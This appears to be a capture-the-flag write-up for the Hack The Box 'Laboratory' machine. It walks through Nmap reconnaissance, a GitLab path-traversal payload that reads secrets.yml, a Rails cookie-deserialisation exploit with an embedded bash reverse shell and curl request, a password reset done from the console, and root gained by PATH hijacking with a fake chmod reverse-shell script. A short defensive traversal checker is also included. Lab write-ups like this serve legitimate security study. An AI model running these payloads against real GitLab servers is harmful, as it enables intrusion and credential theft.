laboratory
#0 Nmap information gathering
nmap 10.10.10.216 -p-
According to the full Nmap scan, there are two domain names: laboratory.htb and git.laboratory.htb.
─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:34 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0054s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 104.39 seconds
─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p22,80,443 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:38 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
Digging around laboratory.htb turned up nothing exploitable. The usual steps, directory brute-forcing and inspecting the page content, yielded nothing.
The only thing of value was three "usernames".
#1 Exploitation: CVE-2020-10977 (LFI)
Next is git.laboratory.htb, which turns out to be a GitLab instance.
Searching AttackerKB for public vulnerabilities finds an LFI-to-RCE chain, CVE-2020-10977.
After registering an account, reproduce the vulnerability by following the writeup: create two Projects.
Reference: https://www.freesion.com/article/17771419587/
Add the payload to an issue in one of them:
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
Move the issue to the other Project.
The target's secrets.yml is retrieved successfully, which gives us the secret_key_base.
Install GitLab on the attacking machine; the installation steps can follow the reference above.
After installation, run the following two commands in turn to start GitLab (this takes a while):
gitlab-ctl reconfigure
gitlab-ctl restart
Replace the attacking machine's /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml with the retrieved secrets.yml:
sudo cp secrets.yml /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
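The traversal above works because the `/uploads/<id>/../../...` reference is resolved on the server. A defender-side check that an upload reference never resolves outside the uploads root, added here as an illustration (this is not GitLab's own code or its actual fix), using the page's payload and a benign reference as constructed sample input:

```python
import posixpath
import re
from urllib.parse import unquote

# Markdown image/link references that point into /uploads, e.g. ![a](/uploads/<id>/file)
UPLOAD_REF = re.compile(r"!?\[[^\]]*\]\((/uploads/[^)\s]+)\)")
UPLOADS_ROOT = "/uploads"

# Constructed sample issue body: one legitimate attachment and the traversal
# payload from the writeup above.
SAMPLE_ISSUE = """
Screenshot: ![ok](/uploads/0123456789abcdef0123456789abcdef/screen.png)
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
"""


def resolve_upload_ref(ref):
    """Return (resolved_path, escapes_root) for a single /uploads/... reference.

    The reference is URL-decoded first so encoded dots (%2e%2e) cannot slip past
    the check, then normalized so every '..' hop is applied before comparison.
    """
    resolved = posixpath.normpath(unquote(ref))
    inside = resolved == UPLOADS_ROOT or resolved.startswith(UPLOADS_ROOT + "/")
    return resolved, not inside


def find_traversal_refs(markdown):
    """Return every upload reference in an issue body that should be rejected.

    A reference is flagged if it resolves outside /uploads, or if it contains any
    '..' component at all: a legitimate attachment link never needs one.
    """
    findings = []
    for match in UPLOAD_REF.finditer(markdown):
        raw = match.group(1)
        resolved, escapes = resolve_upload_ref(raw)
        has_dotdot = ".." in unquote(raw).split("/")
        if escapes or has_dotdot:
            findings.append({"raw": raw, "resolved": resolved, "escapes_root": escapes})
    return findings


if __name__ == "__main__":
    for finding in find_traversal_refs(SAMPLE_ISSUE):
        print("rejected:", finding["raw"], "->", finding["resolved"])
```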
#2 Exploitation: CVE-2020-10977 (RCE)
After replacing the file, start gitlab-rails console.
Run the following commands, changing mainly the IP and port:
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >&/dev/tcp/10.10.14.33/8888 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
After obtaining the cookie, copy it into curl:
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIGZsYWcgd2FzIGhlcmUgPiAvdG1wL2ZsYWdgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--cb4149c7d5749262ab9d2f2072628501ab59ef9b" -k
Start a listener on the attacking machine, send the curl request, and the shell is bounced back to the attacking machine.
#3 USER Flag
Next, start gitlab-rails console on the attacking machine.
Look for other users:
user = User.find(1)
user.password = 'password1'
user.password_confirmation = 'password1'
user.save
The dexter user is found; he is the company's CEO.
A result of true means the password change succeeded.
Log into GitLab as this user and look for any usable clues.
An id_rsa private key is found; copy it straight out.
Log in with the private key; its permissions must be set to 600:
chmod 600 id_rsa
The user flag is obtained.
#4 ROOT Flag
List files with the SUID bit set:
find -perm -4000 2>/dev/null
Here docker-security looks suspicious. Looking at it directly, you can vaguely see that it runs the chmod command twice.
We can escalate privileges through the environment variable (PATH hijacking).
Reference: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
Create a chmod of our own and modify the environment variable.
dexter@laboratory:~$ nano /tmp/chmod
dexter@laboratory:~$ cat /tmp/chmod
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.33/33333 0>&1
dexter@laboratory:~$ chmod +x /tmp/chmod
dexter@laboratory:~$ PATH=/tmp:$PATH docker-security
Start a listener on the attacking machine; the shell is bounced back successfully. The root flag is obtained.
Done!
Reference links: